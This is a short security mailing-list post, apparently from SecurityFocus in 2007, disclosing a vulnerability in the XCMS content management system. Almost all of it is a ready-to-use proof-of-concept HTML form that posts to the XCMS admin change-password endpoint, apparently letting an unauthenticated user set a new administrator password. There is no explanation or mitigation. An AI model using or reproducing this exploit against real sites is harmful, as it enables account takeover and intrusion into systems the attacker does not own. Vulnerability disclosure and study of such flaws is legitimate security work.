xcms all version arbitrary code execution Sep 22 2007 10:17AM
x0kster gmail com
<!--

-[ Name : XCMS Arbitrary Command Execution Vulnerability ]-
-[ Download : http://www.xcms.it/index.php?lng=it&mod=download&pg=indice&c=2 ]-
-[ Author : x0kster ]-
-[ Email : x0kster[AT]gmail[DOT]com ]-
-[ Date : 20-09-2007 ]-

-->
<html>
<head>
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
</head>
<body>
<pre>
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - x0kster (at) gmail (dot) com [email concealed] ] -
</pre>
<form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&pg=admin&s=cpass">
<input type="hidden" name="pass" value="1190316852" />
<pre>
Password : <input type="password" size="20" name="password_1190316852" />
Repete password : <input type="password" size="20" name="rpassword_1190316852" />
<input type="submit" value="Modifica Password" />
</pre>
</form>
</body>
</html>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus